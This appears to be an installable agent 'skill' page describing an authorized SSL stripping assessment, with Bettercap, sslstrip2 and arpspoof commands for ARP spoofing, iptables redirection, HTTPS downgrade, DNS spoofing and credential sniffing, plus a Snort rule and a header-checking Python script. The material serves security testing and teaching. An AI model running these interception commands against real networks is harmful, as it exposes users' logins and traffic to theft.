network security

Performing SSL Stripping Attack

Simulates SSL stripping attacks using sslstrip, Bettercap, and mitmproxy in authorized environments to test HSTS enforcement, certificate validation, and HTTPS upgrade mechanisms that protect users from downgrade attacks on encrypted connections.

hstshttpsnetwork-securityssl-strippingtls-security
Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-Skills
Framework mappings

When to Use

  • Testing whether web applications properly enforce HTTPS through HSTS headers and redirect chains
  • Validating that HSTS preloading is correctly configured and registered in browser preload lists
  • Demonstrating the risk of cleartext HTTP to stakeholders during authorized security assessments
  • Assessing whether internal applications and thick clients validate TLS certificates and reject downgrades
  • Training SOC teams to detect SSL stripping indicators in network traffic

Do not use against networks or applications without explicit written authorization, to intercept real user credentials, or against production systems during business hours without change management approval.

Prerequisites

  • Written authorization specifying in-scope applications and approved attack techniques
  • Bettercap 2.x or sslstrip2 installed on the attacker machine
  • ARP spoofing or other MITM positioning established (see ARP spoofing skill)
  • IP forwarding enabled on the attacker machine
  • Wireshark for verifying attack success and capturing evidence
  • Test accounts (not real user credentials) for demonstrating credential interception

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Workflow

Step 1: Establish MITM Position

# Enable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=1
 
# Position via ARP spoofing using Bettercap
sudo bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.50; arp.spoof on"
 
# Alternatively, use arpspoof from dsniff
sudo arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.1 &

Step 2: Execute SSL Stripping with Bettercap

# Start Bettercap with SSL stripping
sudo bettercap -iface eth0
 
# Enable ARP spoofing
> set arp.spoof.targets 192.168.1.50
> set arp.spoof.fullduplex true
> arp.spoof on
 
# Enable HTTP proxy with SSL stripping
> set http.proxy.sslstrip true
> set http.proxy.port 8080
> http.proxy on
 
# Enable network sniffer for credential capture
> set net.sniff.verbose true
> net.sniff on
 
# Watch for intercepted HTTP traffic (was HTTPS)
# Bettercap will show credentials and URLs in real-time

Step 3: Execute SSL Stripping with sslstrip2

# Configure iptables to redirect HTTP traffic through sslstrip
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
 
# Start sslstrip
sudo sslstrip2 -l 10000 -w sslstrip_log.txt
 
# In another terminal, monitor the log for intercepted credentials
tail -f sslstrip_log.txt | grep -i "pass\|user\|login\|email"
 
# sslstrip works by:
# 1. Intercepting HTTP responses containing HTTPS links
# 2. Replacing https:// with http:// in the response
# 3. Maintaining HTTPS connection to the real server
# 4. Serving downgraded HTTP to the victim

Step 4: Test HSTS Bypass Techniques

# Check if target has HSTS header
curl -sI https://target-app.example.com | grep -i strict-transport-security
 
# Check if target is on the HSTS preload list
curl -s "https://hstspreload.org/api/v2/status?domain=example.com" | python3 -m json.tool
 
# Test HSTS bypass via subdomain substitution
# sslstrip2 can replace URLs with similar-looking HTTP alternatives:
# https://accounts.google.com -> http://accounts.google.com (fails if HSTS)
# https://accounts.google.com -> http://accounts.google.com. (trailing dot bypass attempt)
 
# Bettercap HSTS bypass with DNS spoofing
sudo bettercap -iface eth0
> set arp.spoof.targets 192.168.1.50
> arp.spoof on
> set dns.spoof.domains target-app.example.com
> set dns.spoof.address 192.168.1.99
> dns.spoof on
> set http.proxy.sslstrip true
> http.proxy on
 
# For applications not on HSTS preload, clear HSTS cache in test browser:
# Chrome: chrome://net-internals/#hsts -> Delete domain security policies
# Firefox: Clear recent history -> Active Logins (resets HSTS)

Step 5: Validate Detection and Controls

# Check from victim's perspective:
# 1. Browser address bar should show http:// instead of https://
# 2. No padlock icon visible
# 3. If HSTS is effective, browser should show error and refuse connection
 
# Capture evidence of the downgrade
tshark -i eth0 -f "host 192.168.1.50 and port 80" \
  -T fields -e frame.time -e ip.src -e ip.dst -e http.host -e http.request.uri \
  -Y "http.request" > ssl_strip_evidence.txt
 
# Verify what the victim sees vs what goes to the real server
# Victim to attacker: HTTP (port 80, cleartext)
tshark -i eth0 -f "src host 192.168.1.50 and dst port 80" -c 20
 
# Attacker to real server: HTTPS (port 443, encrypted)
tshark -i eth0 -f "dst port 443 and dst host <real_server_ip>" -c 20
 
# Check IDS/SIEM for detection
# Snort rule that should detect SSL stripping indicators:
# alert tcp any any -> $HOME_NET 80 (msg:"Possible SSL Strip - Login form over HTTP";
#   flow:to_client,established; content:"type=\"password\""; nocase;
#   content:"http://"; nocase; sid:9000010;)
 
# Check for HSTS missing header alerts
curl -s http://target-app.example.com | grep -i "password\|login"
# If login form is served over HTTP, SSL stripping succeeded

Step 6: Clean Up and Report

# Stop SSL stripping
# In Bettercap:
> http.proxy off
> arp.spoof off
> quit
 
# Remove iptables rules
sudo iptables -t nat -F PREROUTING
 
# Disable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=0
 
# Kill background processes
sudo killall sslstrip2 arpspoof 2>/dev/null
 
# Verify network is restored
ping -c 1 192.168.1.1

Key Concepts

Term Definition
SSL Stripping Downgrade attack that intercepts HTTP-to-HTTPS redirects, maintaining encrypted connection to the server while serving cleartext HTTP to the victim
HSTS (HTTP Strict Transport Security) HTTP response header that instructs browsers to only connect via HTTPS for a specified duration, preventing SSL stripping in subsequent visits
HSTS Preloading Submission of domains to browser-maintained lists that enforce HTTPS from the very first connection, closing the first-visit vulnerability window
Certificate Transparency Public logging framework for TLS certificates that enables detection of misissued certificates but does not prevent SSL stripping
Mixed Content Web pages served over HTTPS that load resources (scripts, images) over HTTP, creating partial downgrade vulnerability
Upgrade-Insecure-Requests CSP directive that instructs browsers to upgrade HTTP requests to HTTPS, complementing HSTS for mixed content prevention

Tools & Systems

  • Bettercap 2.x: Network attack framework with integrated SSL stripping, HTTP/HTTPS proxying, and credential sniffing
  • sslstrip2: Dedicated SSL stripping tool that transparently downgrades HTTPS to HTTP with URL rewriting
  • mitmproxy: TLS-intercepting proxy that can modify response headers to remove HSTS and other security headers
  • curl: Command-line tool for testing HSTS headers, redirect chains, and certificate validation
  • hstspreload.org: Public HSTS preload list checker for verifying domain inclusion in browser preload databases

Common Scenarios

Scenario: Testing HSTS Implementation on a Banking Web Application

Context: A bank deployed HSTS on their online banking portal (banking.example.com) six months ago and wants to verify it effectively prevents SSL stripping. The assessment is authorized to test from a workstation on the same VLAN as the test environment using dedicated test accounts.

Approach:

  1. Verify HSTS header presence and values: curl -sI https://banking.example.com | grep -i strict reveals max-age=31536000; includeSubDomains; preload
  2. Check HSTS preload status: confirmed the domain is on Chrome and Firefox preload lists
  3. Set up Bettercap with ARP spoofing and SSL stripping against a test workstation
  4. Attempt to access banking.example.com from the test workstation -- Chrome refuses connection with NET::ERR_CERT_AUTHORITY_INVALID (HSTS prevents downgrade)
  5. Test with a fresh browser profile (no HSTS cache) -- still blocked because domain is preloaded
  6. Test the bank's mobile app -- app successfully connects over HTTP (does not enforce HSTS), exposing credentials in cleartext
  7. Test subdomain api.banking.example.com -- not on preload list, SSL stripping succeeds on first visit before HSTS header is cached

Pitfalls:

  • Testing with a browser that already has HSTS cached for the target domain and concluding HSTS works, when a first-time visitor might be vulnerable
  • Not testing subdomains separately -- includeSubDomains only works after the parent domain's HSTS header is received
  • Forgetting to test mobile applications which may not respect HSTS headers at all
  • Not checking for mixed content that could leak session tokens even with HSTS enabled

Output Format

## SSL Stripping Assessment Report
 
**Test ID**: SSL-STRIP-2024-001
**Target Application**: banking.example.com
**Test Date**: 2024-03-15
 
### HSTS Configuration
 
| Property | Value | Status |
|----------|-------|--------|
| HSTS Header Present | Yes | PASS |
| max-age | 31536000 (1 year) | PASS |
| includeSubDomains | Yes | PASS |
| preload | Yes | PASS |
| In Chrome Preload List | Yes | PASS |
 
### SSL Stripping Test Results
 
| Target | Client | HSTS Status | Strip Result |
|--------|--------|-------------|--------------|
| banking.example.com | Chrome (cached) | Active | BLOCKED |
| banking.example.com | Chrome (fresh) | Preloaded | BLOCKED |
| banking.example.com | Mobile App | Not Enforced | VULNERABLE |
| api.banking.example.com | Chrome (fresh) | Not Preloaded | VULNERABLE (first visit) |
 
### Recommendations
1. Implement TLS certificate pinning in the mobile banking app (Critical)
2. Submit api.banking.example.com to HSTS preload list separately
3. Add Content-Security-Policy: upgrade-insecure-requests header
4. Implement certificate transparency monitoring for the domain
Source materials

References and resources

Everything below is rendered for inspection. Script files are read-only and never run.

References 1

api-reference.md2.0 KB

API Reference: SSL Stripping Assessment Agent

Overview

Automates SSL stripping vulnerability assessment by checking HSTS headers, preload list status, redirect chains, mixed content, and security headers using curl subprocess calls.

Dependencies

Package Version Purpose
subprocess stdlib Runs curl for HTTP header inspection
re stdlib Regex parsing of HSTS header values
json stdlib Parses hstspreload.org API responses

External Tools Required

Tool Purpose
curl HTTP/HTTPS header and content fetching

Core Functions

check_hsts_header(target_url)

Fetches response headers and parses Strict-Transport-Security values.

  • Returns: dict with hsts_present, max_age, include_subdomains, preload

check_hsts_preload(domain)

Queries the hstspreload.org API to check browser preload list inclusion.

  • Returns: dict with status and preloaded boolean

check_redirect_chain(url)

Follows HTTP redirects to verify HTTPS upgrade behavior.

  • Returns: dict with initial_url, final_url, upgrades_to_https

check_mixed_content(url)

Scans page HTML for HTTP resource references on HTTPS pages.

  • Returns: dict with mixed_content_found and http_reference_count

check_security_headers(url)

Checks for CSP, X-Content-Type-Options, X-Frame-Options, and Upgrade-Insecure-Requests.

  • Returns: dict[str, bool] - header name to presence mapping

run_assessment(targets)

Full assessment pipeline for a list of target domains.

  • Parameters: targets (list[str]) - domain names
  • Returns: list[dict] - per-target assessment results with ssl_strip_risk

Risk Levels

Level Criteria
HIGH No HSTS header present
MEDIUM HSTS present but not in preload list
LOW HSTS with preload list inclusion

Usage

python agent.py example.com banking.example.com api.example.com

Scripts 1

agent.py5.7 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
# For authorized penetration testing and educational environments only.
# Usage against targets without prior mutual consent is illegal.
# It is the end user's responsibility to obey all applicable local, state and federal laws.
"""SSL stripping assessment agent using subprocess wrappers for bettercap and curl."""

import subprocess
import re
import json
import sys


def check_hsts_header(target_url):
    """Check HSTS header on a target URL using curl."""
    result = subprocess.run(
        ["curl", "-sI", "--max-time", "10", target_url],
        capture_output=True, text=True, timeout=15
    )
    headers = result.stdout
    hsts_match = re.search(
        r"strict-transport-security:\s*(.+)", headers, re.IGNORECASE
    )
    findings = {"url": target_url, "hsts_present": False, "details": {}}
    if hsts_match:
        hsts_value = hsts_match.group(1).strip()
        findings["hsts_present"] = True
        findings["details"]["raw"] = hsts_value
        max_age = re.search(r"max-age=(\d+)", hsts_value)
        if max_age:
            findings["details"]["max_age"] = int(max_age.group(1))
        findings["details"]["include_subdomains"] = "includesubdomains" in hsts_value.lower()
        findings["details"]["preload"] = "preload" in hsts_value.lower()
    return findings


def check_hsts_preload(domain):
    """Check if domain is in HSTS preload list via the hstspreload.org API."""
    try:
        result = subprocess.run(
            ["curl", "-s", f"https://hstspreload.org/api/v2/status?domain={domain}"],
            capture_output=True, text=True, timeout=15
        )
        data = json.loads(result.stdout)
        return {
            "domain": domain,
            "status": data.get("status", "unknown"),
            "preloaded": data.get("status") == "preloaded",
        }
    except (json.JSONDecodeError, subprocess.TimeoutExpired):
        return {"domain": domain, "status": "error", "preloaded": False}


def check_redirect_chain(url):
    """Follow HTTP redirects and check for HTTPS upgrade."""
    result = subprocess.run(
        ["curl", "-sIL", "--max-time", "10", "-o", "/dev/null",
         "-w", "%{redirect_url}\\n%{url_effective}\\n%{scheme}", url],
        capture_output=True, text=True, timeout=15
    )
    lines = result.stdout.strip().split("\n")
    return {
        "initial_url": url,
        "redirect_url": lines[0] if len(lines) > 0 else "",
        "final_url": lines[1] if len(lines) > 1 else "",
        "final_scheme": lines[2] if len(lines) > 2 else "",
        "upgrades_to_https": lines[2] == "HTTPS" if len(lines) > 2 else False,
    }


def check_mixed_content(url):
    """Fetch page and check for HTTP resources on an HTTPS page."""
    result = subprocess.run(
        ["curl", "-s", "--max-time", "10", url],
        capture_output=True, text=True, timeout=15
    )
    body = result.stdout
    http_refs = re.findall(r'(src|href|action)=["\']http://', body, re.IGNORECASE)
    return {
        "url": url,
        "mixed_content_found": len(http_refs) > 0,
        "http_reference_count": len(http_refs),
    }


def check_security_headers(url):
    """Check for key security headers that complement HSTS."""
    result = subprocess.run(
        ["curl", "-sI", "--max-time", "10", url],
        capture_output=True, text=True, timeout=15
    )
    headers_text = result.stdout.lower()
    checks = {
        "content-security-policy": "content-security-policy:" in headers_text,
        "x-content-type-options": "x-content-type-options:" in headers_text,
        "x-frame-options": "x-frame-options:" in headers_text,
        "upgrade-insecure-requests": "upgrade-insecure-requests" in headers_text,
    }
    return checks


def run_assessment(targets):
    """Run full SSL stripping assessment against a list of target domains."""
    results = []
    for target in targets:
        https_url = f"https://{target}"
        http_url = f"http://{target}"
        entry = {"target": target}
        entry["hsts"] = check_hsts_header(https_url)
        entry["preload"] = check_hsts_preload(target)
        entry["redirect"] = check_redirect_chain(http_url)
        entry["mixed_content"] = check_mixed_content(https_url)
        entry["security_headers"] = check_security_headers(https_url)
        vulnerable = (
            not entry["hsts"]["hsts_present"]
            or not entry["preload"]["preloaded"]
            or entry["mixed_content"]["mixed_content_found"]
        )
        entry["ssl_strip_risk"] = "HIGH" if not entry["hsts"]["hsts_present"] else (
            "MEDIUM" if not entry["preload"]["preloaded"] else "LOW"
        )
        results.append(entry)
    return results


def print_report(results):
    print("SSL Stripping Assessment Report")
    print("=" * 50)
    for r in results:
        print(f"\nTarget: {r['target']}")
        print(f"  HSTS Present:     {r['hsts']['hsts_present']}")
        if r["hsts"]["hsts_present"]:
            d = r["hsts"]["details"]
            print(f"    max-age:        {d.get('max_age', 'N/A')}")
            print(f"    subdomains:     {d.get('include_subdomains', False)}")
            print(f"    preload dir:    {d.get('preload', False)}")
        print(f"  Preload List:     {r['preload']['status']}")
        print(f"  HTTP->HTTPS:      {r['redirect']['upgrades_to_https']}")
        print(f"  Mixed Content:    {r['mixed_content']['http_reference_count']} refs")
        print(f"  SSL Strip Risk:   {r['ssl_strip_risk']}")
        sh = r["security_headers"]
        missing = [h for h, v in sh.items() if not v]
        if missing:
            print(f"  Missing Headers:  {', '.join(missing)}")


if __name__ == "__main__":
    targets = sys.argv[1:] if len(sys.argv) > 1 else ["example.com"]
    results = run_assessment(targets)
    print_report(results)
Keep exploring